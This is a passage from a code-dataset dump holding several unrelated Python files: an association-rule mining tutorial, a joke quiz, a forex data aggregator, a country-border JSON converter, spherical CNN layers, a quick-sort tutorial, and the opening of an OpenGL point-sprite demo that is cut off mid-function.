Scraper/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2120,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"45832812","text":"#\n# Program name: association_basics.py\n# Author: Bong Ju Kang\n# Description: understanding association analysis\n#\n\n# required packages\nimport os\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\nfrom matplotlib import cm\nfrom numpy.random import RandomState\n\nfrom mlxtend.preprocessing import TransactionEncoder\nfrom mlxtend.frequent_patterns import apriori, association_rules\n\nfrom sklearn.cluster import KMeans\nfrom sklearn.datasets.samples_generator import make_blobs\nfrom sklearn.metrics import silhouette_score, 
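The association-analysis script beginning above relies on three metrics that are easy to compute by hand before reaching for mlxtend: support(X) is the fraction of transactions containing X, confidence(X→Y) = support(X∪Y)/support(X), and lift divides that by support(Y). A small standalone check on the same toy basket data:

```python
transactions = [{'milk', 'bread'}, {'butter'}, {'beer', 'diapers'},
                {'milk', 'bread', 'butter'}, {'bread'}]

def support(itemset):
    return sum(itemset <= t for t in transactions) / len(transactions)

conf = support({'milk', 'bread'}) / support({'milk'})   # confidence(milk -> bread)
lift = conf / support({'bread'})
print(support({'milk', 'bread'}), conf, lift)           # 0.4 1.0 1.666...
```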
silhouette_samples\n\n# initial settings\npng_path = \"./data/png\"\nos.makedirs(png_path, exist_ok=True)\n\n# Korean text output in plots\nplt.rcParams['font.family'] = 'Malgun Gothic'\nplt.rcParams['axes.unicode_minus'] = False\n\n#\n# example from the main text\n#\n\n# create the data\ntr_data = [['milk', 'bread'],\n           ['butter'],\n           ['beer', 'diapers'],\n           ['milk', 'bread', 'butter'],\n           ['bread']]\n\n# preprocess the data\ntr_encoder = TransactionEncoder()\ntr_encoder.fit(tr_data)\ntr_encoder.columns_\n# ['beer', 'bread', 'butter', 'diapers', 'milk']\n\ntr_encoder_ary = tr_encoder.transform(tr_data)\ntr_encoder_ary = np.where(tr_encoder_ary==True, 1, 0)\ndf = pd.DataFrame(tr_encoder_ary, columns=tr_encoder.columns_)\nprint(df)\n#    beer  bread  butter  diapers  milk\n# 0     0      1       0        0     1\n# 1     0      0       1        0     0\n# 2     1      0       0        1     0\n# 3     0      1       1        0     1\n# 4     0      1       0        0     0\n\n# fit the association model\nfreq_items = apriori(df, min_support=0.4, use_colnames=True, n_jobs=-1)\n\nfreq_items['length'] = freq_items['itemsets'].apply(lambda x: len(x))\n\n# the itemsets column holds frozenset values, i.e. immutable sets.\ntype(freq_items['itemsets'][0])\n# frozenset\n\n# the two results below are identical.\nfreq_items[freq_items['itemsets'] == {'bread', 'milk'}]\nfreq_items[freq_items['itemsets'] == {'milk', 'bread'}]\n\n#\n# apriori algorithm example\n#\n# construct the data\ntr_data = [[1, 2, 3, 4],\n           [1, 2, 4],\n           [1, 2],\n           [2, 3, 4],\n           [2, 3],\n           [3, 4],\n           [2, 4]]\n\n# preprocess the data\ntr_encoder = TransactionEncoder()\ntr_encoder.fit(tr_data)\ntr_encoder.columns_\n\ntr_encoder_ary = tr_encoder.transform(tr_data)\ntr_encoder_ary = np.where(tr_encoder_ary==True, 1, 0)\ndf = pd.DataFrame(tr_encoder_ary, columns=tr_encoder.columns_)\nprint(df)\n\n# fit the association model\n# all itemsets of length 1\nfreq_items = apriori(df, min_support=0, max_len=1, use_colnames=True)\nprint(freq_items)\n\n# only itemsets with support >= 3/7 = 0.43\nfreq_items = apriori(df, min_support=3/7, max_len=1, use_colnames=True)\nprint(freq_items)\n\n# all itemsets of length 2\nfreq_items = apriori(df, min_support=0, max_len=2, use_colnames=True)\nfreq_items['length'] = freq_items['itemsets'].apply(lambda x: len(x))\n\n# length-2 itemsets that meet the support condition\nprint(freq_items[(freq_items['length'] == 2) & (freq_items['support'] >= 3.0/7.0)])\n#     support itemsets  length\n# 4  0.428571   (1, 2)       2\n# 7  0.428571   (2, 3)       2\n# 8  0.571429   (2, 4)       2\n# 9  0.428571   (3, 4)       2\n\n# all itemsets of length 3\nfreq_items = apriori(df, min_support=0, max_len=3, use_colnames=True)\nfreq_items['length'] = freq_items['itemsets'].apply(lambda x: len(x))\nprint(freq_items[freq_items['length'] == 3])\n#      support   itemsets  length\n# 10  0.142857  (1, 2, 3)       3\n# 11  0.285714  (1, 2, 4)       3\n# 12  0.142857  (1, 3, 4)       3\n# 13  0.285714  (2, 3, 4)       3\n# length-3 itemsets that meet the support condition\nprint(freq_items[(freq_items['length'] == 3) & (freq_items['support'] >= 3.0/7.0)])\n# Empty DataFrame\n# Columns: [support, itemsets, length]\n# Index: []\n# there are no frequent itemsets of length 3, so the search ends at length 2.\n\n#\n# rule generation\n#\n\n# create the frequent itemsets used to generate rules\nfreq_items = apriori(df, min_support=3/7, max_len=3, use_colnames=True)\n\n# generate rules from the frequent itemsets: support, confidence or lift criteria can be applied\nasso_rules = association_rules(freq_items, metric='confidence', min_threshold=1)\nprint(asso_rules.columns)\n# ['antecedents', 'consequents', 'antecedent support',\n#  'consequent support', 'support', 'confidence', 'lift', 'leverage',\n#  'conviction']\n\n# check the results\nasso_rules[['antecedents', 'consequents', 'support', 'confidence', 'lift']]\n\n#\n# example: using the [RETAIL] data\n#\n\n#\n# construct the data\n#\n# load the data\nretail = pd.read_excel('https://archive.ics.uci.edu/ml/machine-learning-databases/00352/Online%20Retail.xlsx')\n# retail.to_csv(data_path+'/retail.csv')\nretail.columns\n# 
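The rule metrics that association_rules reports follow directly from the itemset supports listed above. For example, for the rule 2→4 in the second toy dataset, item 2 appears in 6 of 7 transactions and item 4 in 5 of 7, while {2, 4} has support 4/7; a hand check:

```python
supp_24 = 4/7                 # support({2, 4}) from the length-2 table above
supp_2, supp_4 = 6/7, 5/7     # single-item supports counted from tr_data
confidence = supp_24 / supp_2 # 0.666...
lift = confidence / supp_4    # 0.933..., i.e. 2 and 4 are mildly negatively associated
print(confidence, lift)
```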
Index(['InvoiceNo', 'StockCode', 'Description', 'Quantity', 'InvoiceDate',\n#        'UnitPrice', 'CustomerID', 'Country'],\n#       dtype='object')\n\n# use lowercase column names\nnew_columns = retail.columns.str.lower()\nretail.columns = new_columns\n\n# explore the data\nretail['stockcode'].value_counts()\n# Name: stockcode, Length: 4070, dtype: int64\nretail['country'].value_counts()[:5]\n# United Kingdom    495478\n# Germany             9495\n# France              8557\n# EIRE                8196\n# Spain               2533\n# Name: country, dtype: int64\n\n#\n# subset the data: keep only sales made in Germany\n#\ndf = retail[retail.country=='Germany']\ndf.stockcode.value_counts()\n# Name: stockcode, Length: 1671, dtype: int64\n\n# preprocessing: build the transaction data\n\n# check for missing values\ndf.isna().sum()\n\n# build the transaction data\ntrxs = df.groupby(['invoiceno', 'description'])['quantity'].sum().unstack(fill_value=0).reset_index().set_index('invoiceno')\ntrxs_df = pd.DataFrame(np.where(trxs > 1, 1, 0), columns=trxs.columns, index=trxs.index)\n\n# find frequent itemsets\nsupp_cutoff = 0.05 # 5%\npd.set_option('display.max_columns', 15)\npd.set_option('display.width', 500)\n\nfreq_items = apriori(trxs_df, min_support=supp_cutoff, use_colnames=True)\nfreq_items.sort_values(by='support', ascending=False).head()\n#      support                                      itemsets\n# 12  0.442786                                     (POSTAGE)\n# 18  0.185738          (ROUND SNACK BOXES SET OF4 WOODLAND )\n# 34  0.139303  (ROUND SNACK BOXES SET OF4 WOODLAND , POSTAGE)\n# 17  0.119403          (ROUND SNACK BOXES SET OF 4 FRUITS )\n# 11  0.104478            (PLASTERS IN TIN WOODLAND ANIMALS)\n\n# find rules based on the frequent itemsets\nrules = association_rules(freq_items, metric='lift', min_threshold=1)\nrules.sort_values(by='lift', ascending=False, inplace=True)\n\n# cases where a consequent itemset exists\nrules[rules.consequents != ''][['antecedents', 'consequents', 'support', 'confidence', 'lift']].head()\n#                                       antecedents                                     consequents   support  confidence      lift\n# 4                (PLASTERS IN TIN WOODLAND ANIMALS)                (PLASTERS IN TIN CIRCUS PARADE )  0.051410    0.492063  5.598383\n# 5                  (PLASTERS IN TIN CIRCUS PARADE )              (PLASTERS IN TIN WOODLAND ANIMALS)  0.051410    0.584906  5.598383\n# 34            (ROUND SNACK BOXES SET OF 4 FRUITS )  (ROUND SNACK BOXES SET OF4 WOODLAND , POSTAGE)  0.079602    0.666667  4.785714\n# 31  (ROUND SNACK BOXES SET OF4 WOODLAND , POSTAGE)            (ROUND SNACK BOXES SET OF 4 FRUITS )  0.079602    0.571429  4.785714\n# 26           (ROUND SNACK BOXES SET OF4 WOODLAND )            (ROUND SNACK BOXES SET OF 4 FRUITS )  0.099502    0.535714  4.486607\n\n","sub_path":"reference/understanding-ml-code/ch24-연관 분석/association_basics.py","file_name":"association_basics.py","file_ext":"py","file_size_in_byte":7643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"405532465","text":"import random\n\nChoice = random.choice([\"Is Jacob stable?: \",\"Does Aiden have good fills?: \",\"Does Jacob play good?: \"])\nList = [\"Is Jacob stable?: \",\"Does Aiden have good fills?: \",\"Does Jacob play good?: \"]\nwhile True:\n    Input = input(Choice)\n    if Choice == List[0]:\n        if Input.lower() in [\"yes\",\"y\",\"ye\"]:\n            print(\"Incorrect, doctor says not\")\n            break\n        elif Input.lower() in [\"no\",\"n\"]:\n            print(\"You have 200 IQ\")\n            break\n        else:\n            print(\"Incorrect syntax, try again\")\n    elif Choice == List[1]:\n        print(\"Is this even a question? 
Of course he does, jk he needs notes from bekkett and luke\")\n        break\n    elif Choice == List[2]:\n        if Input.lower() in [\"yes\",\"ye\",\"y\"]:\n            print(\"Incorrect, he needs to take notes\")\n            break\n        elif Input.lower() in [\"no\",\"n\"]:\n            print(\"True, he needs to take notes\")\n            break\n        else:\n            print(\"Incorrect syntax, try again\")","sub_path":"PythonApplication1/src/Choices.py","file_name":"Choices.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"48722464","text":"if __name__ == '__main__':\n\tf = open('USDJPY.csv', 'r')\n\tarray = []\n\tfor line in f:\n\t\tvalues = line.split(',')\n\t\tv_open = eval(values[2])\n\t\tv_high = eval(values[3])\n\t\tv_low = eval(values[4])\n\t\tv_close = eval(values[5])\n\t\tv_amount = eval(values[6])\n\t\tarray.append((v_open, v_close, v_high, v_low, v_amount))\n\tf.close()\n\t\n\tpos = 0\n\tsummary = []\n\t\n\tP = 5\n\t\n\twhile pos + P <= len(array):\n\t\tS = 0\n\t\tA = 0\n\t\tH = 0\n\t\tL = 999\n\t\t\n\t\tv_open = array[pos][0]\n\t\tv_close = array[pos + P - 1][1]\n\t\t\n\t\tfor j in range(P):\n\t\t\th = array[pos + j][2]\n\t\t\tl = array[pos + j][3]\n\t\t\taverage = (h + l) / 2\n\t\t\t\n\t\t\tS += average * array[pos + j][4]\n\t\t\tA += array[pos + j][4]\n\t\t\tH = max(H, h)\n\t\t\tL = min(L, l)\n\t\t\n\t\tsummary.append((S / A, v_open, v_close, H, L, A))\n\t\tpos += P\n\t\n\tM = 100000\n\t\n\tfor j in range(len(summary) // M):\n\t\tf = open('train' + str(j + 1) + '.txt', 'w')\n\t\tfor k in range(M):\n\t\t\tpos = j * M + k\n\t\t\tf.write(str(summary[pos]) + '\\n')\n\t\tf.close()\n\t\t\n\tf = open('test.txt', 'w')\n\tpos = (len(summary) // M) * M\n\twhile pos < len(summary):\n\t\tf.write(str(summary[pos]) + '\\n')\n\t\tpos += 1\n\tf.close()\n","sub_path":"history/extract.py","file_name":"extract.py","file_ext":"py","file_size_in_byte":1088,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"424060472","text":"import re\n\nf = open('wb_dump.sql','r')\np_name = re.compile(\"'[A-Z][a-z]+[^']*'\")\np_coordinates = re.compile(\"MULTIPOLYGON\\([^']*'\")\nfor line in f:\n    m = p_name.search(line)\n    country_name = m.group()[1:(len(m.group())-1)]\n    m = p_coordinates.search(line)\n    coordinates_string = m.group()[13:(len(m.group())-5)]\n    coordinates = coordinates_string.split(' )),((')\n    coordinates[0] = coordinates[0][2:len(coordinates[0])]\n    f_out = open('countries_borders/'+country_name+'.json','w')\n    f_out.write('{\\n')\n    f_out.write('\t\"country_name\": '+ '\"' + country_name + '\",\\n')\n    f_out.write('\t\"coordinates\": [\\n')\n    last_elem = coordinates.pop()\n    for elem in coordinates:\n        f_out.write('\t\t[\\n')\n        terr = elem.split(',')\n        last_path = terr.pop()\n        for path in terr:\n            path = re.sub(' +', ',', path)\n            f_out.write('\t\t\t\"'+ path[0:len(path)-1] + '\",\\n')\n        last_path = re.sub(' +', ',', last_path)\n        f_out.write('\t\t\t\"'+ last_path[0:len(last_path)-1] + '\"\\n')\n        f_out.write('\t\t],\\n')\n    f_out.write('\t\t[\\n')\n    terr = last_elem.split(',')\n    last_path = terr.pop()\n    for path in terr:\n        path = re.sub(' +', ',', path)\n        f_out.write('\t\t\t\"'+ path[0:len(path)-1] + '\",\\n')\n    last_path = re.sub(' +', ',', last_path)\n    f_out.write('\t\t\t\"'+ last_path[0:len(last_path)-1] + '\"\\n')\n    f_out.write('\t\t]\\n')\n    f_out.write('\t]\\n')\n    f_out.write('}')\n    
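extract.py above compresses every P bars into one record whose first field is a volume-weighted average of the bar midpoints ((high+low)/2 weighted by volume). The same aggregation with descriptive names, as a quick sanity check on toy data of my own:

```python
# (open, close, high, low, volume) bars, the tuple layout used in extract.py above
bars = [(1.0, 1.1, 1.2, 0.9, 10), (1.1, 1.0, 1.3, 1.0, 30)]

weighted = sum((h + l) / 2 * v for _, _, h, l, v in bars)
volume = sum(v for *_, v in bars)
vwap = weighted / volume
print(vwap)   # (1.05*10 + 1.15*30) / 40 = 1.125
```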
f_out.close()\nf.close()\n","sub_path":"public/countries/python-script.py","file_name":"python-script.py","file_ext":"py","file_size_in_byte":1443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"143474030","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jun 25 14:18:30 2018\n\n@author: Fenqiang Zhao, https://github.com/zhaofenqiang\n\nContact: zhaofenqiang0221@gmail.com\n\n\"\"\"\n\nimport torch\nimport numpy as np\nimport torch.nn as nn\n\n\nclass repa_conv_layer(nn.Module):\n    \"\"\"Define the convolutional layer on icosahedron discretized sphere using \n    rectangular filter in tangent plane\n    \n    Parameters:\n            in_feats (int) - - input features/channels\n            out_feats (int) - - output features/channels \n            \n    Input: \n        N x in_feats, tensor\n    Return:\n        N x out_feats, tensor\n    \"\"\"  \n    def __init__(self, in_feats, out_feats, neigh_indices, neigh_weights):\n        super(repa_conv_layer, self).__init__()\n\n        self.in_feats = in_feats\n        self.out_feats = out_feats\n        self.neigh_indices = neigh_indices.reshape(-1) - 1\n        self.weight = nn.Linear(25 * in_feats, out_feats)\n        self.nodes_number = neigh_indices.shape[0]\n        \n        neigh_weights = np.reshape(np.tile(neigh_weights, self.in_feats), (neigh_weights.shape[0],neigh_weights.shape[1],3,-1)).astype(np.float32)\n        self.neigh_weights = torch.from_numpy(neigh_weights).cuda()  \n        \n    def forward(self, x):\n        \n        mat = x[self.neigh_indices]\n        mat = mat.view(self.nodes_number, 25, 3, -1)\n        assert(mat.size() == torch.Size([self.nodes_number, 25, 3, self.in_feats]))\n        \n        assert(mat.size() == self.neigh_weights.size())\n\n        x = torch.mul(mat, self.neigh_weights)\n        x = torch.sum(x, 2).view(self.nodes_number, -1)\n        assert(x.size() == torch.Size([self.nodes_number, 25 * self.in_feats]))\n        \n        out = self.weight(x)\n        return out\n\n\nclass onering_conv_layer(nn.Module):\n    \"\"\"The convolutional layer on icosahedron discretized sphere using \n    1-ring filter\n    \n    Parameters:\n            in_feats (int) - - input features/channels\n            out_feats (int) - - output features/channels\n    \n    Input: \n        N x in_feats tensor\n    Return:\n        N x out_feats tensor\n    \"\"\"  \n    def __init__(self, in_feats, out_feats, neigh_orders, neigh_indices=None, neigh_weights=None):\n        super(onering_conv_layer, self).__init__()\n\n        self.in_feats = in_feats\n        self.out_feats = out_feats\n        self.neigh_orders = neigh_orders\n        \n        self.weight = nn.Linear(7 * in_feats, out_feats)\n        \n    def forward(self, x):\n        \n        mat = x[self.neigh_orders].view(len(x), 7*self.in_feats)\n        \n        out_features = self.weight(mat)\n        return out_features\n    \n    \nclass tworing_conv_layer(nn.Module):\n    \"\"\"The convolutional layer on icosahedron discretized sphere using \n    2-ring filter\n    \n    Parameters:\n            in_feats (int) - - input features/channels\n            out_feats (int) - - output features/channels\n    \n    Input: \n        N x in_feats tensor\n    Return:\n        N x out_feats tensor\n    \"\"\"  \n    def __init__(self, in_feats, out_feats, neigh_orders):\n        super(tworing_conv_layer, self).__init__()\n\n        self.in_feats = in_feats\n        self.out_feats = out_feats\n        self.neigh_orders = neigh_orders\n        \n        self.weight = nn.Linear(19 * in_feats, out_feats)\n        \n    def forward(self, x):\n        \n        mat = x[self.neigh_orders].view(len(x), 19*self.in_feats)\n        \n        out_features = self.weight(mat)\n        return out_features\n    \n\n    \nclass pool_layer(nn.Module):\n    \"\"\"\n    The pooling layer on icosahedron discretized sphere using 1-ring filter\n    \n    Input: \n        N x D tensor\n    Return:\n        ((N+6)/4) x D tensor\n    \n    \"\"\"  \n\n    def __init__(self, 
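python-script.py above assembles the country JSON by writing brackets and commas by hand, which is exactly where the last-element special cases go wrong; building a dict and letting json.dump serialize it sidesteps that entirely. A sketch of the equivalent output step, with hypothetical example values:

```python
import json

# Sketch: serialize one country with json.dump instead of manual writes.
country = {
    "country_name": "Andorra",                     # hypothetical example value
    "coordinates": [["1.5,42.6", "1.6,42.5"]],     # one ring of "lon,lat" points
}
with open('countries_borders/Andorra.json', 'w') as f_out:
    json.dump(country, f_out, indent='\t')
```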
neigh_orders, pooling_type='mean'):\n super(pool_layer, self).__init__()\n\n self.neigh_orders = neigh_orders\n self.pooling_type = pooling_type\n \n def forward(self, x):\n \n num_nodes = int((x.size()[0]+6)/4)\n feat_num = x.size()[1]\n x = x[self.neigh_orders[0:num_nodes*7]].view(num_nodes, feat_num, 7)\n if self.pooling_type == \"mean\":\n x = torch.mean(x, 2)\n if self.pooling_type == \"max\":\n x = torch.max(x, 2)\n assert(x[0].size() == torch.Size([num_nodes, feat_num]))\n return x[0], x[1]\n \n assert(x.size() == torch.Size([num_nodes, feat_num]))\n \n return x\n \n \nclass upconv_layer(nn.Module):\n \"\"\"\n The transposed convolution layer on icosahedron discretized sphere using 1-ring filter\n \n Input: \n N x in_feats, tensor\n Return:\n ((Nx4)-6) x out_feats, tensor\n \n \"\"\" \n\n def __init__(self, in_feats, out_feats, upconv_top_index, upconv_down_index):\n super(upconv_layer, self).__init__()\n\n self.in_feats = in_feats\n self.out_feats = out_feats\n self.upconv_top_index = upconv_top_index\n self.upconv_down_index = upconv_down_index\n self.weight = nn.Linear(in_feats, 7 * out_feats)\n \n def forward(self, x):\n \n raw_nodes = x.size()[0]\n new_nodes = int(raw_nodes*4 - 6)\n x = self.weight(x)\n x = x.view(len(x) * 7, self.out_feats)\n x1 = x[self.upconv_top_index]\n assert(x1.size() == torch.Size([raw_nodes, self.out_feats]))\n x2 = x[self.upconv_down_index].view(-1, self.out_feats, 2)\n x = torch.cat((x1,torch.mean(x2, 2)), 0)\n assert(x.size() == torch.Size([new_nodes, self.out_feats]))\n return x\n\n\nclass upsample_interpolation(nn.Module):\n \"\"\"\n The upsampling layer on icosahedron discretized sphere using interpolation\n \n Input: \n N x in_feats, tensor\n Return:\n ((Nx4)-6) x in_feats, tensor\n \n \"\"\" \n\n def __init__(self, upsample_neighs_order):\n super(upsample_interpolation, self).__init__()\n\n self.upsample_neighs_order = upsample_neighs_order\n \n def forward(self, x):\n \n num_nodes = x.size()[0] * 4 - 6\n feat_num = x.size()[1]\n x1 = x[self.upsample_neighs_order].view(num_nodes - x.size()[0], feat_num, 2)\n x1 = torch.mean(x1, 2)\n x = torch.cat((x,x1),0)\n \n return x\n\n\nclass upsample_fixindex(nn.Module):\n \"\"\"\n The upsampling layer on icosahedron discretized sphere using fixed indices 0,\n padding new vertices with 0\n \n Input: \n N x in_feats, tensor\n Return:\n ((Nx4)-6) x in_feats, tensor\n \n \"\"\" \n def __init__(self, upsample_neighs_order):\n super(upsample_fixindex, self).__init__()\n\n self.upsample_neighs_order = upsample_neighs_order\n \n def forward(self, x):\n \n num_nodes = x.size()[0] * 4 - 6\n feat_num = x.size()[1]\n x1 = torch.zeros(num_nodes - x.size()[0], feat_num).cuda()\n x = torch.cat((x,x1),0)\n \n return x\n \n \nclass upsample_maxindex(nn.Module):\n \"\"\"\n The upsampling layer on icosahedron discretized sphere using max indices.\n \n Input: \n N x in_feats, tensor\n Return:\n ((Nx4)-6) x in_feats, tensor\n \n \"\"\" \n\n def __init__(self, num_nodes, neigh_orders):\n super(upsample_maxindex, self).__init__()\n\n self.num_nodes = num_nodes\n self.neigh_orders = neigh_orders\n \n def forward(self, x, max_index):\n \n raw_nodes, feat_num = x.size()\n assert(max_index.size() == x.size())\n x = x.view(-1) \n \n y = torch.zeros(self.num_nodes, feat_num).to(torch.device(\"cuda\"))\n column_ref = torch.zeros(raw_nodes, feat_num)\n for i in range(raw_nodes):\n column_ref[i,:] = i * 7 + max_index[i,:] \n column_index = self.neigh_orders[column_ref.view(-1).long()]\n column_index = 
torch.from_numpy(column_index).long()\n        row_index = np.floor(np.linspace(0.0, float(feat_num), num=raw_nodes*feat_num))\n        row_index[-1] = row_index[-1] - 1\n        row_index = torch.from_numpy(row_index).long()\n        y[column_index, row_index] = x\n        \n        return y\n\n\n    \n","sub_path":"sphericalunet/layers.py","file_name":"layers.py","file_ext":"py","file_size_in_byte":8122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"423645750","text":"\"\"\"\n10.0 Quick Sort\n\n·Pick an element p (the first element) and move it to its final position\n-->the list is split by p into two parts: everything left of p is smaller, everything right of p is larger\n-->recurse to finish sorting\n·Quick sort skeleton:\n    def quick_sort(data, left, right):\n        if left < right:\n            mid = partition(data, left, right)\n            quick_sort(data, left, mid - 1)\n            quick_sort(data, mid + 1, right)\n·Time complexity: O(nlogn)\n·Problems with quick sort: the worst case (e.g. a reversed list is O(n^2)), maximum recursion depth\n\n===============================================================================\n===============================================================================\n\"\"\"\n\n\n# ========== example ==========\ndef partition(li, left, right):\n    tmp = li[left]\n    while left < right:\n        while left < right and li[right] >= tmp:  # find a value smaller than tmp from the right\n            right -= 1  # step one position to the left\n        li[left] = li[right]  # write the right-side value into the empty slot on the left\n        print(li)\n        while left < right and li[left] <= tmp:\n            left += 1\n        li[right] = li[left]  # write the left-side value into the empty slot on the right\n        print(li)\n    li[left] = tmp  # put tmp into its final position\n    return left\n\n\ndef quick_sort(li, left, right):\n    if left < right:  # at least two elements\n        mid = partition(li, left, right)\n        quick_sort(li, left, mid - 1)\n        quick_sort(li, mid + 1, right)\n\n\nli = [5, 7, 4, 6, 3, 1, 2, 9, 8]\nli2 = [7, 2, 8, 4, 6, 7, 5, 6, 4, 9]\n# print(li2)\npartition(li, 0, len(li) - 1)\n# quick_sort(li2, 0, len(li2) - 1)\nprint(li)\n","sub_path":"10 Quick Sort-快速排序.py","file_name":"10 Quick Sort-快速排序.py","file_ext":"py","file_size_in_byte":1588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"165955322","text":"#!/usr/bin/python3\r\n\r\n# Demonstrates point sprites\r\n# Ben Smith\r\n# benjamin.coder.smith@gmail.com\r\n#\r\n# based on pointsprites.cpp\r\n# OpenGL SuperBible\r\n# Program by Richard S. 
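The onering_conv_layer defined earlier reduces spherical convolution to an index gather plus a dense layer: for each of N vertices, the features of a 7-entry neighborhood (the vertex plus its 6 neighbors, per this code's convention) are concatenated and pushed through nn.Linear(7*in_feats, out_feats). A toy-sized trace of that gather, with made-up neighbor indices:

```python
import torch

N, in_feats = 4, 2
x = torch.arange(N * in_feats, dtype=torch.float32).view(N, in_feats)
# Hypothetical flattened neighbor orders: 7 vertex indices per vertex.
neigh_orders = torch.randint(0, N, (N * 7,))
gathered = x[neigh_orders].view(N, 7 * in_feats)   # same reshape as the layer
out = torch.nn.Linear(7 * in_feats, 3)(gathered)   # N x 3
print(out.shape)   # torch.Size([4, 3])
```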
Wright Jr.\r\n\r\n\r\nfrom OpenGL.GL import *\r\nfrom OpenGL.GLUT import *\r\nfrom OpenGL.GLU import *\r\n\r\nfrom PIL import Image\r\nimport time \r\n\r\nESCAPE = b'\\033'\r\n\r\n\r\n\r\nfrom math import cos, sin\r\n\r\nfrom random import randint\r\n\r\nimport sys\r\nsys.path.append(\"../shared\")\r\n\r\nfrom math3d import M3DVector2f\r\n\r\n\r\n# Array of small stars\r\nSMALL_STARS = 100\r\nvSmallStars = [M3DVector2f() for i in range (0, SMALL_STARS)]\r\n\r\nMEDIUM_STARS = 40\r\nvMediumStars = [M3DVector2f() for i in range (0, MEDIUM_STARS)]\r\n\r\nLARGE_STARS = 40\r\nvLargeStars = [M3DVector2f() for i in range (0, LARGE_STARS)]\r\n\r\nSCREEN_X = 800\r\nSCREEN_Y = 600\r\n\r\ndrawMode = 3\r\ntextureObjects = (GLuint * 2)()\r\n\r\ndef InitGL(Width, Height):\r\n\r\n # Turn off blending and all smoothing\r\n if drawMode == 1:\r\n glDisable(GL_BLEND)\r\n glDisable(GL_LINE_SMOOTH)\r\n glDisable(GL_POINT_SMOOTH)\r\n glDisable(GL_TEXTURE_2D)\r\n glDisable(GL_POINT_SPRITE)\r\n \r\n # Turn on antialiasing, and give hint to do the best\r\n # job possible.\r\n if drawMode == 2:\r\n \r\n glBlendFunc(GL_SRC_ALPHA, GL_ONE_MINUS_SRC_ALPHA)\r\n glEnable(GL_BLEND)\r\n glEnable(GL_POINT_SMOOTH)\r\n glHint(GL_POINT_SMOOTH_HINT, GL_NICEST)\r\n glEnable(GL_LINE_SMOOTH)\r\n glHint(GL_LINE_SMOOTH_HINT, GL_NICEST)\r\n glDisable(GL_TEXTURE_2D)\r\n glDisable(GL_POINT_SPRITE)\r\n\r\n # Point Sprites\r\n elif drawMode == 3:\r\n glEnable(GL_BLEND)\r\n glBlendFunc(GL_SRC_COLOR, GL_ONE_MINUS_SRC_COLOR)\r\n glDisable(GL_LINE_SMOOTH)\r\n glDisable(GL_POINT_SMOOTH)\r\n glDisable(GL_POLYGON_SMOOTH)\r\n \r\n # Populate star list\r\n for i in range(0, SMALL_STARS):\r\n vSmallStars[i][0] = float(randint(0, SCREEN_X))\r\n vSmallStars[i][1] = float(randint(0, SCREEN_Y - 100))+100.0\r\n\r\n # Populate star list\r\n for i in range(0, MEDIUM_STARS):\r\n vMediumStars[i][0] = float(randint(0, SCREEN_X * 10))/10.0\r\n vMediumStars[i][1] = float(randint(0, SCREEN_Y - 100))+100.0\r\n\r\n # Populate star list\r\n for i in range(0, LARGE_STARS):\r\n vLargeStars[i][0] = float(randint(0, SCREEN_X * 10))/10.0\r\n vLargeStars[i][1] = float(randint(0, SCREEN_Y - 100) * 10.0)/ 10.0 +100.0\r\n \r\n # Black background\r\n glClearColor(0.0, 0.0, 0.0, 1.0 )\r\n\r\n # Set drawing color to white\r\n glColor3f(0.0, 0.0, 0.0)\r\n\r\n # Load our textures\r\n glGenTextures(2, textureObjects)\r\n glBindTexture(GL_TEXTURE_2D, textureObjects[0])\r\n \r\n # Load this texture map\r\n glTexParameteri(GL_TEXTURE_2D, GL_GENERATE_MIPMAP, GL_TRUE)\r\n img = Image.open('star.png').convert(\"RGB\")\r\n raw_image = img.tobytes()\r\n glTexImage2D(GL_TEXTURE_2D, 0, GL_RGB, img.width, img.height, 0, GL_RGB, GL_UNSIGNED_BYTE, raw_image)\r\n \r\n glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MAG_FILTER, GL_LINEAR)\r\n glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MIN_FILTER, GL_LINEAR_MIPMAP_LINEAR)\r\n glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_WRAP_S, GL_CLAMP_TO_EDGE)\r\n glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_WRAP_T, GL_CLAMP_TO_EDGE)\r\n\r\n glBindTexture(GL_TEXTURE_2D, textureObjects[1])\r\n glTexParameteri(GL_TEXTURE_2D, GL_GENERATE_MIPMAP, GL_TRUE)\r\n img = Image.open('moon.png').convert(\"RGB\")\r\n raw_image = img.tobytes()\r\n glTexImage2D(GL_TEXTURE_2D, 0, GL_RGB, img.width, img.height, 0, GL_RGB, GL_UNSIGNED_BYTE, raw_image)\r\n \r\n glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MAG_FILTER, GL_LINEAR)\r\n glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MIN_FILTER, GL_LINEAR_MIPMAP_LINEAR)\r\n glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_WRAP_S, GL_CLAMP_TO_EDGE)\r\n 
